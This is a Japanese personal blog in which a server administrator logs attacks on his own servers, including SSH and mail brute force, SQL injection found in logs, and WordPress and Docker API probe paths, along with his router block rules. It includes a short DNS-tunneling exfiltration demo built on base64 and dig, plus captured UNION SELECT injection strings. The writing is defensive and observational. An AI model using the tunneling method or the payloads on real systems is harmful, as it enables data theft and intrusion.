ブログ - 攻撃/ブルートフォースカテゴリのエントリ
DNSトンネリングの実演はこんな感じ.
送信したい秘密のデータが"HELLO"だとして,それを一見わからないように暗号化.今回の場合はbase64でエンコード.
エンコードしたデータをホスト部としてDNSルックアップする.
そんなホストは無いと返答がある.
これでgoogle.comのDNSサーバには,SEVMTE8Kというホスト名を検索したというDNSログが残る.DNSクエリを送った対象サーバが悪のあるデータ収集サーバだったら...
悪意のあるプログラムが,DNSリクエストに偽装してデータを送信することでセキュリティゲートウェイやツールでの検知を逃れるのがDNSトンネリング.
よってよくわからない命名規則のホスト名になるSEVMTE8KSEVMTE8KSEVMTE8K.google.comとかの場合,セキュリティツールで検知するように動作する場合がある.
クラウドサービスを使っていてサーバをオートスケールにしている場合,ホスト名はランダムでユニークなものが付与されて時としてSEVMTE8KSEVMTE8KSEVMTE8Kみたいなホスト名になるので,それが検知される場合がある.
情報漏洩になる事象なのか,過検知なのかは,自動では判明しづらいが,セキュリティツールで検知したとしてもワーニング程度にしていることが多い.つまりアラートは通知されるけど通信は止めない.
ハッカーは秘密通信とファイアウォールのバイパスのために DNS トンネリングを悪用する
https://community.riskiq.com/article/7f0d7aa3
引用:
送信したい秘密のデータが"HELLO"だとして,それを一見わからないように暗号化.今回の場合はbase64でエンコード.
$ echo HELLO |base64🆑
SEVMTE8K
$
$ dig SEVMTE8K.google.com🆑
; <<>> DiG 9.10.6 <<>> SEVMTE8K.google.com
;; global options: +cmd
;; Got answer:
;; QUESTION SECTION:
;SEVMTE8K.google.com. IN A🈁
$
これでgoogle.comのDNSサーバには,SEVMTE8Kというホスト名を検索したというDNSログが残る.DNSクエリを送った対象サーバが悪のあるデータ収集サーバだったら...
悪意のあるプログラムが,DNSリクエストに偽装してデータを送信することでセキュリティゲートウェイやツールでの検知を逃れるのがDNSトンネリング.
よってよくわからない命名規則のホスト名になるSEVMTE8KSEVMTE8KSEVMTE8K.google.comとかの場合,セキュリティツールで検知するように動作する場合がある.
クラウドサービスを使っていてサーバをオートスケールにしている場合,ホスト名はランダムでユニークなものが付与されて時としてSEVMTE8KSEVMTE8KSEVMTE8Kみたいなホスト名になるので,それが検知される場合がある.
情報漏洩になる事象なのか,過検知なのかは,自動では判明しづらいが,セキュリティツールで検知したとしてもワーニング程度にしていることが多い.つまりアラートは通知されるけど通信は止めない.
ハッカーは秘密通信とファイアウォールのバイパスのために DNS トンネリングを悪用する
https://community.riskiq.com/article/7f0d7aa3
引用:
Palo Alto は、ハッカーが DNS トンネリングを秘密の通信方法として、また従来のセキュリティ対策を回避するためにどのように利用しているかについて説明します。
引用:
ごきげんよう、
はじめまして。 英国に本拠を置く投資会社は、当社のポートフォリオを世界的に拡大することを非公開で模索しており、プロジェクト/事業の実現可能性と 0877;生可能な保有期間に応じて、期間約 3% の ROI のソフトローンを通じて、現実的で収益性の高いプロジェクト/事業への資金調達に取り組んでいます。 。 個人向けローンもご利用いただけます。
前述の提案についてさらに詳細な議論をすることに興味があれば、喜んでそうさせていただき、あなたの決定に必要な条件を強調表示しま 377;。
できるだけ早くご返信いただければ幸いです。 ご不明な点がございましたら、お気軽にメールでお問い合わせください。
p.twite[@]cwayinvtsp[.]com
よろしくお願いします。
プレストン・トワイト
2008年から使っている某Webサーバのファンが唸りをあげているので調べたら,データベースのCPUが高負荷.
Webアクセスログを調べると,SQLインジェクションを受けていました.
フィンランドのヘルシンキ,パナマ,カナダ,Oracleが関係するFull-stack Software engineerと名乗るRobert de Vriesが設置したサイトが管理しているようになっている.勉強にしては手が混んでいるし素人クローラーでもなさそう.
単純にSELECT文を発行したアクセスをログから抽出してみるとこんな感じ.
AbuseIPDBで調べると,素性はよろしくない.
アクセスの多いIPアドレスからのリクエストパラメータを抽出.
最初の1つをURLデコードするとこうなる.
CHR()という関数があるけど,ASCIIコード表から可視化してみた.
Webアクセスログを調べると,SQLインジェクションを受けていました.
フィンランドのヘルシンキ,パナマ,カナダ,Oracleが関係するFull-stack Software engineerと名乗るRobert de Vriesが設置したサイトが管理しているようになっている.勉強にしては手が混んでいるし素人クローラーでもなさそう.
単純にSELECT文を発行したアクセスをログから抽出してみるとこんな感じ.
$ grep "SELECT" acc.log |awk '{print $1'}|sort|uniq -c|sort -r🆑
1616 193.56.113.14
986 193.56.113.69
941 193.56.113.62
765 193.56.113.7
709 193.56.113.47
679 193.56.113.52
618 193.56.113.24
592 193.56.113.34
589 193.56.113.43
546 193.56.113.29
431 193.56.113.17
422 193.56.113.39
$
アクセスの多いIPアドレスからのリクエストパラメータを抽出.
$ grep "193.56.113.14" acc.log.1699488000 |head -n 5|awk '{print $7}'
index.php?page=%2D1756%20%27%29%20ORDER%20BY%2021%2D%2D
index.php?page=%2D2047%20%27%20UNION%20ALL%20SELECT%20NULL%20FROM%20DUAL%2D%2D
index.php?page=%2D8371%20%27%29%20UNION%20ALL%20SELECT%20NULL%20FROM%20DUAL%2D%2D
index.php?page=%2D9856%20%27%20UNION%20ALL%20SELECT%20CHR%2866%29%7C%7CCHR%2879%29
%7C%7CCHR%2871%29%7C%7CCHR%28100%29%7C%7CCHR%28114%29%7C%7CCHR%28117%29%7C%7CCHR
%2874%29%7C%7CCHR%28100%29%7C%7CCHR%2899%29%7C%7CCHR%2872%29%20FROM%20DUAL%2D%2D
index.php?page=%2D9456%20%27%29%20ORDER%20BY%201%2D%2D
$
%2D1756%20%27%29%20ORDER%20BY%2021%2D%2D
↓
-1756 ') ORDER BY 21--
page=%2D9856%20%27%20UNION%20ALL%20SELECT%20CHR%2866%29%7C%7CCHR%2879%29%7C%7CCHR%2871%29%
↓
page=-9856 ' UNION ALL SELECT CHR(66)||CHR(79)||CHR(71)%
CHR()という関数があるけど,ASCIIコード表から可視化してみた.
長時間SQLインジェクション攻撃を受けた - Havijが使われた件- その3 インドから
- カテゴリ :
- セキュリティ » 攻撃/ブルートフォース
- ブロガー :
- ujpblog 2022/4/11 1:17
先週長時間SQLインジェクション攻撃を受けたのだけれど,また攻撃を受けた.
手口は前回と同じHavijを使ったもの.
execでcmd_shellでcatを実行してpasswdファイルを読み取ろうとしている.いわゆるパストラバーサル.
AbuseIPDBで調べるとまた同時に共通点が1つ見つかりました.
Microsoft Cloudを使っているようだが,今度はインドになっている.こういうのは通報窓口はあるのだろうか.
手口は前回と同じHavijを使ったもの.
execでcmd_shellでcatを実行してpasswdファイルを読み取ろうとしている.いわゆるパストラバーサル.
AbuseIPDBで調べるとまた同時に共通点が1つ見つかりました.
Microsoft Cloudを使っているようだが,今度はインドになっている.こういうのは通報窓口はあるのだろうか.
長時間SQLインジェクション攻撃を受けた件の続報.
まず,攻撃をしてきていたMicrosoft Cloudが管理しているIPアドレスは,その後もSQLインジェクション報告が各国から相次いでいる模様.
それでも100%ブラックには成らないのだなぁ.
そしてトップルータのCPU使用率について考察.
通常時よりは負荷がかかっていた様だけれど,単一セッションだったためかルータのDDoSになるほどでは無かった模様.
逆にDBサーバの状態は深刻.
接続によるスレッドの作成状況は少し増えた程度で変わりがないがテーブルロックが多発している.この辺りを鑑みて,アラートをあげるお手製の仕組みがあれば良いのかな.
まず,攻撃をしてきていたMicrosoft Cloudが管理しているIPアドレスは,その後もSQLインジェクション報告が各国から相次いでいる模様.
それでも100%ブラックには成らないのだなぁ.
そしてトップルータのCPU使用率について考察.
通常時よりは負荷がかかっていた様だけれど,単一セッションだったためかルータのDDoSになるほどでは無かった模様.
逆にDBサーバの状態は深刻.
接続によるスレッドの作成状況は少し増えた程度で変わりがないがテーブルロックが多発している.この辺りを鑑みて,アラートをあげるお手製の仕組みがあれば良いのかな.
寝ようかと思っていたら,サーバのファンが高音でウナっているので状況を確認.
HTTPD数が最大アクセスになっていた.Webアクセスログ数を確認するとこんな感じ.
13時間もアクセスを続けているのは異常.
HTTPD数が最大アクセスになっていた.Webアクセスログ数を確認するとこんな感じ.
13時間もアクセスを続けているのは異常.
Microsoftのこの記事.
Destructive malware targeting Ukrainian organizations
https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/
引用: ランサムウェアのように見えて,身代金要求がなくPCを動作不能にするだけだった模様.
そしてSentinelLABのこの記事.
HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine
https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/
引用: ウクライナ国内の数百台のPCに展開されたHermeticWiperマルウェアがPCを稼働させない様にした.
この「偽の身代金メッセージ」と「破壊的」の手口は,2017年のウクライナを攻撃したNotPetyaに似ているそう.NotPetyaはロシア連邦軍参謀本部情報総局(GRU)が起こしたと分析されている.
サンドワーム
https://ja.wikipedia.org/wiki/%E3%82%B5%E3%83%B3%E3%83%89%E3%83%AF%E3%83%BC%E3%83%A0
ウクライナ侵攻の2月24日の前日に時限で動き,ウクライナ政府機関を狙っているという点で,状況証拠的にもロシアの国家的サイバー攻撃と整理されているそうです.平昌オリンピックの開会式直前で動いたOlympic Destroyerも時限だったし.
Destructive malware targeting Ukrainian organizations
https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/
引用:
1 月 13 日、マイクロソフトは、マスター ブート レコード (MBR) ワイパーアクティビティの可能性があると思われるウクライナからの侵入活動を特定しました。調査の中で、ウクライナの複数の被害者組織に対する侵入攻撃に使用されているユニークなマルウェア機能が見つかりました。
そしてSentinelLABのこの記事.
HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine
https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/
引用:
エグゼクティブサマリー2月23日、脅威インテリジェンスコミュニティは、ウクライナの組織で流通している新しいワイパーマルウェアサンプルを観察し始めました。 この分析では、署名されたドライバーが Windows デバイスを対象とするワイパーを展開するために使用され、MBR を操作して、その後のブート失敗が発生していることを示しています。
この「偽の身代金メッセージ」と「破壊的」の手口は,2017年のウクライナを攻撃したNotPetyaに似ているそう.NotPetyaはロシア連邦軍参謀本部情報総局(GRU)が起こしたと分析されている.
サンドワーム
https://ja.wikipedia.org/wiki/%E3%82%B5%E3%83%B3%E3%83%89%E3%83%AF%E3%83%BC%E3%83%A0
ウクライナ侵攻の2月24日の前日に時限で動き,ウクライナ政府機関を狙っているという点で,状況証拠的にもロシアの国家的サイバー攻撃と整理されているそうです.平昌オリンピックの開会式直前で動いたOlympic Destroyerも時限だったし.
今日もロシア政府のサイトにアクセスしてみたのだけれど,珍しいHTTP 408エラーが出てます.
サーバ側のエラーになる503(Service Temporarily Unavailable)はよく見る?けれど,クライアント側からのリクエスト送信が遅いってこと.
他のネットワーク接続が遅いわけでも無いから,経路中のどこかがシェイピングされている感じかなぁ.相手のサーバはちゃんと動いているっぽい.
人道的なところからロシアとのインターネットは遮断しないという意見が多いようだけれど,統一方針は無いので企業ごとに対応は違っていて,一部プロバイダが遮断していることもある模様.
そうなると経路迂回をするので遅くなったりするかも.
ショッピングやサービス系は次々と停止していて,昨日今日はTikTokがロシア国内からの通信を遮断した様だけれど,ロシアからの声もロシアへの声も聞こえないってことか.
やっぱラジオかな.
サーバ側のエラーになる503(Service Temporarily Unavailable)はよく見る?けれど,クライアント側からのリクエスト送信が遅いってこと.
他のネットワーク接続が遅いわけでも無いから,経路中のどこかがシェイピングされている感じかなぁ.相手のサーバはちゃんと動いているっぽい.
人道的なところからロシアとのインターネットは遮断しないという意見が多いようだけれど,統一方針は無いので企業ごとに対応は違っていて,一部プロバイダが遮断していることもある模様.
そうなると経路迂回をするので遅くなったりするかも.
ショッピングやサービス系は次々と停止していて,昨日今日はTikTokがロシア国内からの通信を遮断した様だけれど,ロシアからの声もロシアへの声も聞こえないってことか.
やっぱラジオかな.
サイバー攻撃を受けているというロシア政府のWebサイトにアクセスしてみたら半死状態でしたが,では現時点でのウクライナ政府のサイトはどうなのか.
すごくシンプルな内容.トップページは問題なくアクセスできるしレスポンスタイムも悪く無いが,3つの画像のリンク先はアクセスできない.
暫定的にこの様なシンプルページになっているのか?と思い,Web Archveで過去のサイトを確認.
2014年現在でも同じ様な作りでした.
ちなみに,Webサーバの設置してあるIPアドレスを調べてみました.
ブルガリアってなっています.ブルガリアもソ連の侵攻を受けて衛星国家だったが,今回のロシアの行動を容認できないといっていた国防大臣がSNSでの反発を受けて首相に罷免されたそうだ.どのポジションなんだろう.
すごくシンプルな内容.トップページは問題なくアクセスできるしレスポンスタイムも悪く無いが,3つの画像のリンク先はアクセスできない.
暫定的にこの様なシンプルページになっているのか?と思い,Web Archveで過去のサイトを確認.
2014年現在でも同じ様な作りでした.
ちなみに,Webサーバの設置してあるIPアドレスを調べてみました.
ブルガリアってなっています.ブルガリアもソ連の侵攻を受けて衛星国家だったが,今回のロシアの行動を容認できないといっていた国防大臣がSNSでの反発を受けて首相に罷免されたそうだ.どのポジションなんだろう.
ロシアへのアクセスが遮断されているのでは?ということで,
ロシア政府のサイトへアクセスしてみたら,半死状態でした.
ちょうど,ロシアのドーピング?違法っぽいドラッグサイトからの迷惑メールが届いたので確認してみました.
まずはメール.
よくあるバイアグラ.本文にはビタミンとサプリメントと書いてあるけれどメアドにズバリバイアグラ.
URLがロシアなのでアクセスしてみると.
問題なくアクセスできますね.ロシアにあるカナダファーマシー?
このドメインのIPアドレスを調べるとモスクワとなっています.
ロシア的にはバイアグラの販売サイトは違法なのか知らないけれど,民間?のフィッシングサイトなので問題なく現在もアクセスできる様ですね.
ロシア政府のサイトへアクセスしてみたら,半死状態でした.
ちょうど,ロシアのドーピング?違法っぽいドラッグサイトからの迷惑メールが届いたので確認してみました.
まずはメール.
よくあるバイアグラ.本文にはビタミンとサプリメントと書いてあるけれどメアドにズバリバイアグラ.
URLがロシアなのでアクセスしてみると.
問題なくアクセスできますね.ロシアにあるカナダファーマシー?
このドメインのIPアドレスを調べるとモスクワとなっています.
ロシア的にはバイアグラの販売サイトは違法なのか知らないけれど,民間?のフィッシングサイトなので問題なく現在もアクセスできる様ですね.
日経の記事.
ロシア、自国ネットを「防衛遮断」か ハッカーと攻防 2022年3月4日 18:00 (2022年3月5日 5:50更新)
https://www.nikkei.com/article/DGXZQOUC273W50X20C22A2000000/
引用:
3月5日にロシア政府のサイトにアクセスしたら,ERR_CONNECTION_RESETとなった.
IPアドレスはこんな感じ.
IPアドレスの評価は・・・
ひどいもんだ.アノニマスに乗っ取られて悪いことされ放題状態に陥っていたのかな?
今,アクセスするとこんな感じ.
これじゃぁロシア政府が声明を出そうとしても,インターネッツは役に立ちませんね.
ロシア、自国ネットを「防衛遮断」か ハッカーと攻防 2022年3月4日 18:00 (2022年3月5日 5:50更新)
https://www.nikkei.com/article/DGXZQOUC273W50X20C22A2000000/
引用:
ロシアが自国のサイバー防衛のため、一部サイトの海外からのネット接続を遮断している可能性が出てきた。日本経済新聞の調べでは同国国防省や金融機関などのサイトがロシア国内や親ロ国からのアクセスのみを許可する状態となっていた。ハッカー集団「アノニマス」対策との見方がある。当事国以外も巻き込みサイバー攻防は入り組んだ展開となっている。
3月5日にロシア政府のサイトにアクセスしたら,ERR_CONNECTION_RESETとなった.
IPアドレスはこんな感じ.
IPアドレスの評価は・・・
ひどいもんだ.アノニマスに乗っ取られて悪いことされ放題状態に陥っていたのかな?
今,アクセスするとこんな感じ.
これじゃぁロシア政府が声明を出そうとしても,インターネッツは役に立ちませんね.
SASL LOGIN authentication failed概況 20201204
- カテゴリ :
- セキュリティ » 攻撃/ブルートフォース
- ブロガー :
- ujpblog 2020/12/4 1:16
毎日のMailSumのレポートが楽しみな今日この頃.
ブルートフォースは封じられた...が,よくみると近いサブネットからゆるりとアクセスが来ている.
AbuseIPDBにレポートするには,面倒なタイプ.
ブルートフォースは封じられた...が,よくみると近いサブネットからゆるりとアクセスが来ている.
AbuseIPDBにレポートするには,面倒なタイプ.
Wordpress 用FileManager の脆弱性やDockerAPI を狙ったアクセスの観測
- カテゴリ :
- セキュリティ » 攻撃/ブルートフォース
- ブロガー :
- ujpblog 2020/11/24 11:20
Wordpress 用FileManager を標的としたアクセスの観測等について
https://www.npa.go.jp/cyberpolice/important/2020/202011201.html
WordPress用.
Docker API用.
アクセスログ状に,これらのアクセスが記録されて居たら,何かあるってことかな.
https://www.npa.go.jp/cyberpolice/important/2020/202011201.html
WordPress用.
wp-content/plugins/wp-file-manager/readme.txt
wp-content/plugins/wp-file-manager/lib/php/
GET /v1.16/version
GET /version
GET /_ping
HEAD /_ping
GET /v1.18/coutainers/json
GET /v1.40/containers/json?all=1
GET /info
GET /images/json?
アクセスログ状に,これらのアクセスが記録されて居たら,何かあるってことかな.
IPAの発表.
インターネット定点観測レポート(2020年 7~9月)
https://www.jpcert.or.jp/tsubame/report/report202007-09.html
TCP 445ポートが増えている模様.SMBですな.うちにもそういうのが届いて居るか,モニタリングしてみるかなぁ...
インターネット定点観測レポート(2020年 7~9月)
https://www.jpcert.or.jp/tsubame/report/report202007-09.html
TCP 445ポートが増えている模様.SMBですな.うちにもそういうのが届いて居るか,モニタリングしてみるかなぁ...
日々遮断していることで,エラーも減って来ました.
総当たりで突破される可能性が低くなるだけの意味はあるね.ルータのCPUも目に見えて増えてはいないし.
世の中的にはIoTマルウェアのパケットが増加しているそうだ.
日本国内のMiraiの特徴を持つパケットの送信元IPアドレス数急増について
https://blog.nicter.jp/2020/10/jp_mirai_spike/
んー.プロバイダと切断する都度IPアドレスが変わるタイプを使われるとIPアドレスのブロックというのも限界(過剰)となることもあるということか.
総当たりで突破される可能性が低くなるだけの意味はあるね.ルータのCPUも目に見えて増えてはいないし.
世の中的にはIoTマルウェアのパケットが増加しているそうだ.
日本国内のMiraiの特徴を持つパケットの送信元IPアドレス数急増について
https://blog.nicter.jp/2020/10/jp_mirai_spike/
んー.プロバイダと切断する都度IPアドレスが変わるタイプを使われるとIPアドレスのブロックというのも限界(過剰)となることもあるということか.
AbuseIPDBに不正なSSHログインのIPアドレスを登録してみたら最初のレポートだった
- カテゴリ :
- セキュリティ » 攻撃/ブルートフォース
- ブロガー :
- ujpblog 2020/11/7 1:38
今日時点で53 IPを登録して来たけれど.(ほぼ手動)
自分がレポートしたものが最初の事案もちらほら.たとえばこれ.
引用: 嫌がらせということも考えられるので,1レポートだけでも4%なのでしょう.でも間違いなく自分のルータが攻撃されたエビデンス.
1日に14回もSSHで接続しようとしているので,間違いなく悪意があるでしょう.そんなサービスは提供していないので.
自分がレポートしたものが最初の事案もちらほら.たとえばこれ.
引用:
Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.
最近のレポート。先週、このIPアドレスから虐待的な活動の報告を受けました。それは潜在的にまだ積極的に虐待活動に従事しています。
1日に14回もSSHで接続しようとしているので,間違いなく悪意があるでしょう.そんなサービスは提供していないので.
SASL LOGIN authentication failedを発生させる接続を遮断.
最初はフィルタ追加して遮断することで,相手の行動変化を観察しようとしたけれど,攻撃が止むモノ,気にせず攻撃を続けるモノの2つにしか別れないので,観察は中止して10件以上エラーを発生させている場合は普通にブロック.
自動化していかねば...
ip filter 2601 reject-nolog 45.142.120.0/24 * * * *
ip filter 2602 reject-nolog 140.238.101.176 * * * *
ip filter 2603 reject-nolog 120.130.176.55 * * * *
ip filter 2604 reject-nolog 45.145.185.119 * * * *
ip filter 2605 reject-nolog 212.70.149.0/24 * * * *
ip filter 2606 reject-nolog 159.89.103.100 * * * *
ip filter 2607 reject-nolog 193.169.252.206 * * * *
ip filter 2608 reject-nolog 141.98.10.0/24 * * * *
ip filter 2609 reject-nolog 156.96.47.5 * * * *
ip filter 2610 reject-nolog 103.253.42.54 * * * *
ip filter 2611 reject-nolog 185.36.81.33 * * * *
ip filter 2612 reject-nolog 195.168.129.74 * * * *
ip filter 2613 reject-nolog 107.170.127.8 * * * *
ip filter 2614 reject-nolog 94.102.49.117 * * * *
ip filter 2615 reject-nolog 45.129.33.0/24 * * * *
ip filter 2616 reject-nolog 195.54.161.0/24 * * * *
ip filter 2617 reject-nolog 193.27.228.153 * * * *
ip filter 2618 reject-nolog 143.110.150.24 * * * *
ip filter 2619 reject-nolog 45.125.65.0/24 * * * *
ip filter 2620 reject-nolog 103.207.38.234 * * * *
ip filter 2621 reject-nolog 37.49.225.201 * * * *
ip filter 2622 reject-nolog 141.98.80.76 * * * *
ip filter 2623 reject-nolog 5.188.206.201 * * * *
ip filter 2624 reject-nolog 195.54.161.0/24 * * * *
ip filter 2625 reject-nolog 45.145.66.0/24 * * * *
自動化していかねば...
AbuseIPDBに自分の管理するIPアドレスが登録されてしまったので,アカウントを取得して解除申請をしたのだけれど,受け付けたとかどうだとか何もなく・・・
もう一回申請しようとたら,協議中の事で静観...
ふと,さっき見たら解除されていました.
そして解除したとメールが来て居ました.
3〜4日で解除されるということかな.よかったよかった.
もう一回申請しようとたら,協議中の事で静観...
ふと,さっき見たら解除されていました.
そして解除したとメールが来て居ました.
3〜4日で解除されるということかな.よかったよかった.
AbuseIPDBで被疑のIPアドレスを調査していて,デフォルトで自分のアクセスしたIPアドレスが入っている状態で,間違ってCHECKボタンを押してしまったら,なんと2020年9月20日に,登録されてしまってました.
ちょっと濡れ衣は困るので,削除してもらおうとコンタクトしようとすると・・・・
引用: 無料ユーザに登録すると,削除申請できるらしい...むむむっ・・・
引用:
FREE FOREVER!
1,000 IP Checks & Reports / Day
100 Prefix Checks/Day
Basic Blacklist
だそうです. 登録して,サインインする.
拡大してこれ.
REQUEST TAKEDOWN! 取り下げて!
しばらく様子を見るか...と言いつつこれを買いている時点で23時間くらい経過しているけれど...
ちょっと濡れ衣は困るので,削除してもらおうとコンタクトしようとすると・・・・
引用:
Important: Please do not contact us with requests to remove an IP address abuse report! Registered users have the option to remove their own reports via the "My Reports" section of your user control panel. Furthermore, there is an takedown request feature on the each reported IPs page, usable by all registered users.
重要: IPアドレスの不正使用レポートを削除する要求で私たちに連絡しないでください! 登録ユーザーは、ユーザーコントロールパネルの "マイレポート "セクションを介して自分のレポートを削除するオプションがあります。さらに、報告された各IPsページには、すべての登録ユーザーが利用できる削除要求機能があります。
引用:
Join the AbuseIPDB community, contribute abuse reports, and use the API to protect your lower-traffic servers and websites.
AbuseIPDB コミュニティに参加し、不正使用レポートを投稿し、API を使用して低トラフィックのサーバーやウェブサイトを保護します。
FREE FOREVER!
1,000 IP Checks & Reports / Day
100 Prefix Checks/Day
Basic Blacklist
だそうです. 登録して,サインインする.
拡大してこれ.
REQUEST TAKEDOWN! 取り下げて!
しばらく様子を見るか...と言いつつこれを買いている時点で23時間くらい経過しているけれど...
ブロックして観察していると諦めてアクセスしてこなくなる場合もあれば,気にせず機械的にアクセスし続けて来る場合もある.
2020.10.28のレポート
現在の定義はこれ.
あまりにも遮断されるアクセスが多いものは,ログあふれも頻繁に発生させるのでreject-nologとして観察も中止.
3年前に「ヤマハのRTX1100で中国からの不正なVPNをブロックする」として観察していた不正アクセスしてくるTop 10のIPアドレスは,今調べるとほとんどはクリーンなIPアドレスとして評価されている模様.(情報が抹消されただけと)
2020.10.28のレポート
現在の定義はこれ.
ip filter 2601 reject 43.142.120.0/24 * * * *
ip filter 2602 reject 140.238.101.176 * * * *
ip filter 2603 reject 120.130.176.55 * * * *
ip filter 2604 reject-nolog 45.145.185.119 * * * *
ip filter 2605 reject-nolog 212.70.149.0/24 * * * *
ip filter 2606 reject 159.89.103.100 * * * *
ip filter 2607 reject 193.169.252.206 * * * *
ip filter 2608 reject 141.98.10.0/24 * * * *
ip filter 2609 reject 156.96.47.5 * * * *
ip filter 2610 reject 103.253.42.54 * * * *
ip filter 2611 reject 185.36.81.33 * * * *
ip filter 2612 reject 195.168.129.74 * * * *
ip filter 2613 reject 107.170.127.8 * * * *
3年前に「ヤマハのRTX1100で中国からの不正なVPNをブロックする」として観察していた不正アクセスしてくるTop 10のIPアドレスは,今調べるとほとんどはクリーンなIPアドレスとして評価されている模様.(情報が抹消されただけと)
イランからのブルートフォース.止めるまでの間にも攻撃を加速していた模様.
1600回越えだったものが1000以下にできたのでサブネットでブロックしたのも効果的か.
ただし,そうするとまた新たな攻撃が目立って来る.
イギリスのやばいやつだ.Fixed Line ISPってなっているので,固定IPでSASL LOGINしてきているので,MI5かなにかか?
ということで,サブネットでブロックして見たけれど,えらいことになりました.
4秒に一回程度のスピードで複数のIPアドレスを使ってブルートフォースしてきている.
ふと,攻撃遮断くんを眺めていたら・・・
見覚えのあるIPアドレスが....国旗を見ると,こちらもイランになっている.イランのサイバー攻撃手法でイギリスにある固定IPのサーバが乗っ取られて攻撃してきているということか?(全部推測)
攻撃遮断くん 統計データ
https://shadan-kun.com/map/
APT33かな?
ATP33
https://attack.mitre.org/groups/G0064/
引用: うちのサイトも,空飛ぶポケモンを大事にしているし,メガシンカさせるためのメガエナジーを貯めているのでそういうサイトに該当するのかも.
1600回越えだったものが1000以下にできたのでサブネットでブロックしたのも効果的か.
ただし,そうするとまた新たな攻撃が目立って来る.
イギリスのやばいやつだ.Fixed Line ISPってなっているので,固定IPでSASL LOGINしてきているので,MI5かなにかか?
ということで,サブネットでブロックして見たけれど,えらいことになりました.
4秒に一回程度のスピードで複数のIPアドレスを使ってブルートフォースしてきている.
ふと,攻撃遮断くんを眺めていたら・・・
見覚えのあるIPアドレスが....国旗を見ると,こちらもイランになっている.イランのサイバー攻撃手法でイギリスにある固定IPのサーバが乗っ取られて攻撃してきているということか?(全部推測)
攻撃遮断くん 統計データ
https://shadan-kun.com/map/
APT33かな?
ATP33
https://attack.mitre.org/groups/G0064/
引用:
APT33は、少なくとも2013年から活動を行っているイランの脅威グループと疑われています。同グループは、米国、サウジアラビア、韓国の複数の産業にまたがる組織を標的にしており、特に航空・エネルギー分野に関心を寄せている。
うちのメールサーバのMailSumのレポートを見ていると,SASL Loginに大量の失敗をしているIPアドレスが.
2020.10.20
素性を調べると,イランでした.スコアも良くない.IPアドレスをブロック.
早速ブロック.
2020.10.23<
ブロックしたのだけれど,それに気づいたようで別のIPアドレスからアクセスが来ることに.
観察していると2日ほどで元の攻撃件数に戻ったので,セグメント毎ブロック.
2020.10.26
これでしばらく落ち着くかなぁ.(やり出したら永遠の戦い)
2020.10.20
素性を調べると,イランでした.スコアも良くない.IPアドレスをブロック.
早速ブロック.
2020.10.23<
ブロックしたのだけれど,それに気づいたようで別のIPアドレスからアクセスが来ることに.
観察していると2日ほどで元の攻撃件数に戻ったので,セグメント毎ブロック.
2020.10.26
これでしばらく落ち着くかなぁ.(やり出したら永遠の戦い)
クラウド系として整理できるホスティングサービスから,当サイトへのアクセスをブロックすることにしてみました.サーバからのアクセスなので基本的に人間じゃないので,攻撃と思えるようなアクセスが多いのです.
アクセスブロック効果はでていて,サーバの負荷が下がった...わけでもなく偶にスパイクされる事がある.嫌がらせアクセスなのかなぁ.
あまぞんやさくらのIPアドレス範囲は公開されてないので,しばらくはアドレスを収集して,ブロックしていく感じになります.取り急ぎ,自動収集とブロックのシステムを開発して投入してみました.
海外からのアクセスもブロックする仕組みを作りたいな.
アクセスブロック効果はでていて,サーバの負荷が下がった...わけでもなく偶にスパイクされる事がある.嫌がらせアクセスなのかなぁ.
あまぞんやさくらのIPアドレス範囲は公開されてないので,しばらくはアドレスを収集して,ブロックしていく感じになります.取り急ぎ,自動収集とブロックのシステムを開発して投入してみました.
海外からのアクセスもブロックする仕組みを作りたいな.
SSHブルートフォースの傾向?を調べてみた.
rootユーザで接続を試みる奴
こんな感じで集計してみた.
3万5千回! ちなみに3つとも中国のIPアドレス.
どんなユーザで接続を試みているのか
rootユーザで接続を試みる奴
こんな感じで集計してみた.
$ grep root secure.log*|grep "error: PAM: "|awk '{print $13}'|sort|uniq -cするとこんな結果が.
36490 122.228.207.219
783 124.173.121.191
67 80.193.233.35
3万5千回! ちなみに3つとも中国のIPアドレス.
どんなユーザで接続を試みているのか